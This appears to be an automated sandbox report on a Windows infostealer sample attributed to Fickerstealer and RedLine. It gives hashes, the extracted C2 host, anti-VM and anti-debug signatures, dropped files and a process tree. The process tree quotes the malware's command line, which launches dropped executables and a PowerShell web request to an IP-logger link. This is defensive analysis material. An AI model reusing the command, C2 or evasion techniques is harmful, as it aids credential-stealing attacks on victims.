Analysis

  • max time kernel
    168s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    15-02-2022 12:04

General

  • Target

    7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe

  • Size

    3.0MB

  • MD5

    c0786eaf915a205bb066e598e5418c6b

  • SHA1

    8440f9408fa74c88fad34977ca1ac639c1f5ef2e

  • SHA256

    7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed

  • SHA512

    4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4

Malware Config

Extracted

Family

fickerstealer

C2

game2030.site:80

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • .NET Reactor protector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
    "C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
        "MMP1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
          "MMP1.exe"
          4⤵
          • Executes dropped EXE
          PID:3420
      • C:\Users\Admin\AppData\Local\Temp\Ww.exe
        "Ww.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2252
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1800
  • C:\Windows\system32\MusNotifyIcon.exe
    %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
    1⤵
    • Checks processor information in registry
    PID:1868
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    PID:1248
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:3868

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Virtualization/Sandbox Evasion: 1 (T1497)

  • Discovery
    Query Registry: 3 (T1012)
    Virtualization/Sandbox Evasion: 1 (T1497)
    System Information Discovery: 4 (T1082)


Downloads

  • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
    MD5

    5ca7fa3d1d1efdffada437068eccbd4e

    SHA1

    0204b4435a79e1d3ce325706801ba3687e86dccf

    SHA256

    8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

    SHA512

    15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

  • C:\Users\Admin\AppData\Local\Temp\Ww.exe
    MD5

    e58d740f792702828c45ebfb73c8a95d

    SHA1

    8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9

    SHA256

    ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10

    SHA512

    9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8

  • C:\Users\Admin\AppData\Local\Temp\nsa7ECE.tmp\JHILLSVZFH1MBP.dll
    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

  • memory/1800-157-0x00000000077C0000-0x00000000077E2000-memory.dmp
    Filesize

    136KB

  • memory/1800-150-0x00000000071A0000-0x00000000071D6000-memory.dmp
    Filesize

    216KB

  • memory/1800-164-0x0000000008AD0000-0x0000000008AEA000-memory.dmp
    Filesize

    104KB

  • memory/1800-163-0x0000000009DD0000-0x000000000A44A000-memory.dmp
    Filesize

    6.5MB

  • memory/1800-162-0x0000000007335000-0x0000000007337000-memory.dmp
    Filesize

    8KB

  • memory/1800-161-0x0000000008080000-0x000000000809E000-memory.dmp
    Filesize

    120KB

  • memory/1800-159-0x0000000008010000-0x0000000008076000-memory.dmp
    Filesize

    408KB

  • memory/1800-158-0x0000000007FA0000-0x0000000008006000-memory.dmp
    Filesize

    408KB

  • memory/1800-152-0x0000000007970000-0x0000000007F98000-memory.dmp
    Filesize

    6.2MB

  • memory/1800-147-0x00000000738CE000-0x00000000738CF000-memory.dmp
    Filesize

    4KB

  • memory/1800-151-0x0000000007332000-0x0000000007333000-memory.dmp
    Filesize

    4KB

  • memory/1800-149-0x0000000007330000-0x0000000007331000-memory.dmp
    Filesize

    4KB

  • memory/2252-142-0x0000000077164000-0x0000000077166000-memory.dmp
    Filesize

    8KB

  • memory/2252-160-0x00000000058A0000-0x00000000058DC000-memory.dmp
    Filesize

    240KB

  • memory/2252-146-0x00000000738CE000-0x00000000738CF000-memory.dmp
    Filesize

    4KB

  • memory/2252-153-0x00000000060B0000-0x00000000066C8000-memory.dmp
    Filesize

    6.1MB

  • memory/2252-154-0x0000000003620000-0x0000000003632000-memory.dmp
    Filesize

    72KB

  • memory/2252-155-0x0000000005A90000-0x0000000005B9A000-memory.dmp
    Filesize

    1.0MB

  • memory/2252-156-0x0000000005A80000-0x0000000005A81000-memory.dmp
    Filesize

    4KB

  • memory/2252-139-0x0000000076DD0000-0x0000000076DD1000-memory.dmp
    Filesize

    4KB

  • memory/2252-140-0x0000000076DD0000-0x0000000076DD1000-memory.dmp
    Filesize

    4KB

  • memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp
    Filesize

    7.4MB

  • memory/2592-135-0x0000000003FB0000-0x0000000003FF7000-memory.dmp
    Filesize

    284KB

  • memory/2592-133-0x00000000024E9000-0x0000000002511000-memory.dmp
    Filesize

    160KB

  • memory/2592-134-0x00000000024E9000-0x0000000002511000-memory.dmp
    Filesize

    160KB

  • memory/3420-141-0x0000000000400000-0x000000000044F000-memory.dmp
    Filesize

    316KB

  • memory/3420-137-0x0000000000400000-0x000000000044F000-memory.dmp
    Filesize

    316KB